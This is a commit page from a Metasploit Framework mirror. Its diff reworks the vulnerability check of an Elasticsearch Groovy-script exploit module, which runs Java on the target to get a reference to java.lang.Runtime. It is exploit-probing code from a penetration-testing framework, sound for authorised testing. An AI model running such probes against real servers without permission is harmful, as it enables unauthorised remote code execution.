infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update check

bug/bundler_fix
jvazquez-r7 2015-03-10 09:26:22 -05:00
parent fc4b312879
commit 9dc99e4207
1 changed files with 9 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/multi/elasticsearch/search_groovy_script.rb
View File

@ -99,33 +99,30 @@ class Metasploit3 < Msf::Exploit::Remote
end
def vulnerable?
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
java = 'java.lang.Math.class.forName("java.lang.Runtime")'
java = java_sum([addend_one, addend_two])
vprint_status("#{peer} attempting to execute '#{java}' in Java")
vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
res = execute(java)
result = parse_result(res)
if result.nil?
vprint_status("#{peer} no response to executed Java")
vprint_status("#{peer} - no response to test")
return false
else
vprint_status("#{peer} response to executed Java: #{result}")
result.to_i == sum
elsif result == 'class java.lang.Runtime'
return true
end
false
end
def parse_result(res)
unless res
vprint_error("#{peer} no response")
vprint_error("#{peer} - No response")
return nil
end
unless res.code == 200 && res.body
vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
return nil
end